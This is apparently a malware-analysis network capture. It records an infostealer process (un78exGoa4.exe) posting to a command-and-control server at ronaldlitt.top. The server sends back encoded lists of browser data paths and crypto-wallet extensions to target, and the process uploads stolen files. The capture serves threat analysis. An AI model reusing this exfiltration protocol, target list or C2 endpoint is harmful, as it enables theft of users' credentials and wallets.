May 28, 2023 09:29:40.654975891 CEST	94	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:40 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 140 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 4e 7a 45 7a 4f 47 51 30 4e 54 6b 30 5a 54 59 33 4d 47 51 34 4f 54 46 6a 4d 6a 4d 31 5a 47 49 7a 4d 32 51 31 4d 6a 4d 77 59 6a 41 31 5a 57 45 77 4d 54 63 7a 5a 6d 51 78 4e 44 67 35 59 7a 5a 6c 5a 54 51 7a 4d 54 67 35 4d 32 5a 6b 5a 54 67 34 5a 54 51 35 4e 54 63 35 5a 54 45 33 5a 57 59 31 66 47 52 76 62 6d 56 38 61 6d 46 79 5a 47 6c 75 4c 6e 4a 30 5a 6e 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 Data Ascii: NzEzOGQ0NTk0ZTY3MGQ4OTFjMjM1ZGIzM2Q1MjMwYjA1ZWEwMTczZmQxNDg5YzZlZTQzMTg5M2ZkZTg4ZTQ5NTc5ZTE3ZWY1fGRvbmV8amFyZGluLnJ0ZnwxfDF8MXwxfDF8MXwxfDF8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49712	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:40.725977898 CEST	95	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: ronaldlitt.top Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 2d 2d 0d 0a Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="message"browsers------CBFBKFIDHIDGHJKFBGHC--
May 28, 2023 09:29:40.796806097 CEST	96	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:40 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1340 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 5a 70 64 6d 46 73 5a 47 6c 38 58 46 5a 70 64 6d 46 73 5a 47 6c 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 44 62 32 31 76 5a 47 38 67 52 48 4a 68 5a 32 39 75 66 46 78 44 62 32 31 76 5a 47 39 63 52 48 4a 68 5a 32 39 75 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 52 58 42 70 59 31 42 79 61 58 5a 68 59 33 6c 43 63 6d 39 33 63 32 56 79 66 46 78 46 63 47 6c 6a 49 46 42 79 61 58 5a 68 59 33 6b 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 76 59 30 4e 76 59 33 78 63 51 32 39 6a 51 32 39 6a 58 45 4a 79 62 33 64 7a 5a 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 43 63 6d 46 32 5a 58 78 63 51 6e 4a 68 64 6d 56 54 62 32 5a 30 64 32 46 79 5a 56 78 43 63 6d 46 32 5a 53 31 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 51 32 56 75 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 5a 57 35 30 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 64 54 64 47 46 79 66 46 77 33 55 33 52 68 63 6c 77 33 55 33 52 68 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 5a 57 52 76 64 43 42 43 63 6d 39 33 63 32 56 79 66 46 78 44 61 47 56 6b 62 33 52 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 4e 61 57 4e 79 62 33 4e 76 5a 6e 51 67 52 57 52 6e 5a 58 78 63 54 57 6c 6a 63 6d 39 7a 62 32 5a 30 58 45 56 6b 5a 32 56 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 7a 4e 6a 41 67 51 6e 4a 76 64 33 4e 6c 63 6e 78 63 4d 7a 59 77 51 6e 4a 76 64 33 4e 6c 63 6c 78 43 63 6d 39 33 63 32 56 79 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 55 56 46 43 63 6d 39 33 63 32 56 79 66 46 78 55 5a 57 35 6a 5a 57 35 30 58 46 46 52 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 79 65 58 42 30 62 31 52 68 59 6e 78 63 51 33 4a 35 63 48 52 76 56 47 46 69 49 45 4a 79 62 33 64 7a 5a 58 4a 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 50 63 47 56 79 59 53 42 54 64 47 46 69 62 47 56 38 58 45 39 77 5a 58 4a 68 49 46 4e 76 5a 6e 52 33 59 58 4a 6c 66 47 39 77 5a 58 4a 68 66 45 39 77 5a 58 4a 68 49 45 64 59 49 46 4e 30 59 57 4a 73 5a 58 78 63 54 33 42 6c 63 6d 45 67 55 32 39 6d 64 48 64 68 63 6d 56 38 62 33 42 6c 63 6d 46 38 54 57 39 36 61 57 78 73 59 53 42 47 61 58 Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIERhdGF8Y2hyb21lfFZpdmFsZGl8XFZpdmFsZGlcVXNlciBEYXRhfGNocm9tZXxDb21vZG8gRHJhZ29ufFxDb21vZG9cRHJhZ29uXFVzZXIgRGF0YXxjaHJvbWV8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENvY0NvY3xcQ29jQ29jXEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxCcmF2ZXxcQnJhdmVTb2Z0d2FyZVxCcmF2ZS1Ccm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8Q2VudCBCcm93c2VyfFxDZW50QnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDdTdGFyfFw3U3Rhclw3U3RhclxVc2VyIERhdGF8Y2hyb21lfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXxNaWNyb3NvZnQgRWRnZXxcTWljcm9zb2Z0XEVkZ2VcVXNlciBEYXRhfGNocm9tZXwzNjAgQnJvd3NlcnxcMzYwQnJvd3NlclxCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfENyeXB0b1RhYnxcQ3J5cHRvVGFiIEJyb3dzZXJcVXNlciBEYXRhfGNocm9tZXxPcGVyYSBTdGFibGV8XE9wZXJhIFNvZnR3YXJlfG9wZXJhfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8TW96aWxsYSBGaX
May 28, 2023 09:29:40.796840906 CEST	97	IN	Data Raw: 4a 6c 5a 6d 39 34 66 46 78 4e 62 33 70 70 62 47 78 68 58 45 5a 70 63 6d 56 6d 62 33 68 63 55 48 4a 76 5a 6d 6c 73 5a 58 4e 38 5a 6d 6c 79 5a 57 5a 76 65 48 78 51 59 57 78 6c 49 45 31 76 62 32 35 38 58 45 31 76 62 32 35 6a 61 47 6c 73 5a 43 42 51 Data Ascii: JlZm94fFxNb3ppbGxhXEZpcmVmb3hcUHJvZmlsZXN8ZmlyZWZveHxQYWxlIE1vb258XE1vb25jaGlsZCBQcm9kdWN0aW9uc1xQYWxlIE1vb25cUHJvZmlsZXN8ZmlyZWZveHxPcGVyYSBDcnlwdG8gU3RhYmxlfFxPcGVyYSBTb2Z0d2FyZXxvcGVyYXxUaHVuZGVyYmlyZHxcVGh1bmRlcmJpcmRcUHJvZmlsZXN8ZmlyZWZve

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.5	49721	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:44.317657948 CEST	1424	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAEGIIECGHCBFHJKEHDB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:44.317703009 CEST	1425	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 49 45 43 47 48 43 42 46 48 4a 4b 45 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------DAEGIIECGHCBFHJKEHDBContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:44.412874937 CEST	1426	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.5	49722	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:44.482593060 CEST	1426	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFIJEBFCGDAAKFHIDBF Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:44.482687950 CEST	1428	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 43 46 49 4a 45 42 46 43 47 44 41 41 4b 46 48 49 44 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------FCFIJEBFCGDAAKFHIDBFContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:44.596837997 CEST	1428	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.5	49723	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:44.669718027 CEST	1429	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAEBGCFIEHCFIDGCAAFB Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:44.669770002 CEST	1431	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 45 42 47 43 46 49 45 48 43 46 49 44 47 43 41 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BAEBGCFIEHCFIDGCAAFBContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:44.761943102 CEST	1431	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.5	49724	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:44.852670908 CEST	1432	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFBAFBFIEHIDBGDHCGIE Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:44.852709055 CEST	1434	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 42 41 46 42 46 49 45 48 49 44 42 47 44 48 43 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CFBAFBFIEHIDBGDHCGIEContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:44.965430975 CEST	1434	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:44 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.5	49725	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:45.029692888 CEST	1434	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBAFBGIDHCBFHIECFCBG Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:45.029733896 CEST	1436	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------EBAFBGIDHCBFHIECFCBGContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:45.137706041 CEST	1437	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.5	49726	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:45.209572077 CEST	1437	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKKEGIDBGHIDGDHDBFH Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:45.209633112 CEST	1439	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4b 45 47 49 44 42 47 48 49 44 47 44 48 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BKKKEGIDBGHIDGDHDBFHContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:45.300324917 CEST	1439	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.5	49727	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:45.376451015 CEST	1440	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDHCAAKECFIDHIEBAK Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:45.376578093 CEST	1442	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 48 43 41 41 4b 45 43 46 49 44 48 49 45 42 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------AFHDHCAAKECFIDHIEBAKContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:45.475369930 CEST	1442	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.5	49728	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:45.562896013 CEST	1443	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD Host: ronaldlitt.top Content-Length: 1743 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:45.562954903 CEST	1445	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:45.649214029 CEST	1445	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
18	192.168.2.5	49729	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:45.725951910 CEST	1445	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CBFBKFIDHIDGHJKFBGHC Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:45.726010084 CEST	1447	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 42 46 42 4b 46 49 44 48 49 44 47 48 4a 4b 46 42 47 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------CBFBKFIDHIDGHJKFBGHCContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:45.814913034 CEST	1448	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
19	192.168.2.5	49730	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:45.894476891 CEST	1448	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE Host: ronaldlitt.top Content-Length: 1759 Connection: Keep-Alive Cache-Control: no-cache
May 28, 2023 09:29:45.894622087 CEST	1450	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="file_name"ZmlsZXNcREVTS
May 28, 2023 09:29:46.011310101 CEST	1450	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49713	193.106.175.215	80	C:\Users\user\Desktop\un78exGoa4.exe

Timestamp	kBytes transferred	Direction	Data
May 28, 2023 09:29:40.856625080 CEST	97	OUT	POST /25d4fc7fb0cb6b78.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCGDAFCFHIDBGDHCFCB Host: ronaldlitt.top Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 31 33 38 64 34 35 39 34 65 36 37 30 64 38 39 31 63 32 33 35 64 62 33 33 64 35 32 33 30 62 30 35 65 61 30 31 37 33 66 64 31 34 38 39 63 36 65 65 34 33 31 38 39 33 66 64 65 38 38 65 34 39 35 37 39 65 31 37 65 66 35 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 47 44 41 46 43 46 48 49 44 42 47 44 48 43 46 43 42 2d 2d 0d 0a Data Ascii: ------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="token"7138d4594e670d891c235db33d5230b05ea0173fd1489c6ee431893fde88e49579e17ef5------GHCGDAFCFHIDBGDHCFCBContent-Disposition: form-data; name="message"plugins------GHCGDAFCFHIDBGDHCFCB--
May 28, 2023 09:29:40.922844887 CEST	99	IN	HTTP/1.1 200 OK Date: Sun, 28 May 2023 07:29:40 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 5056 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d 5a 75 59 6d 56 73 5a 6d 52 76 5a 57 6c 76 61 47 56 75 61 32 70 70 59 6d 35 74 59 57 52 71 61 57 56 6f 61 6d 68 68 61 6d 4a 38 4d 58 77 77 66 44 42 38 51 32 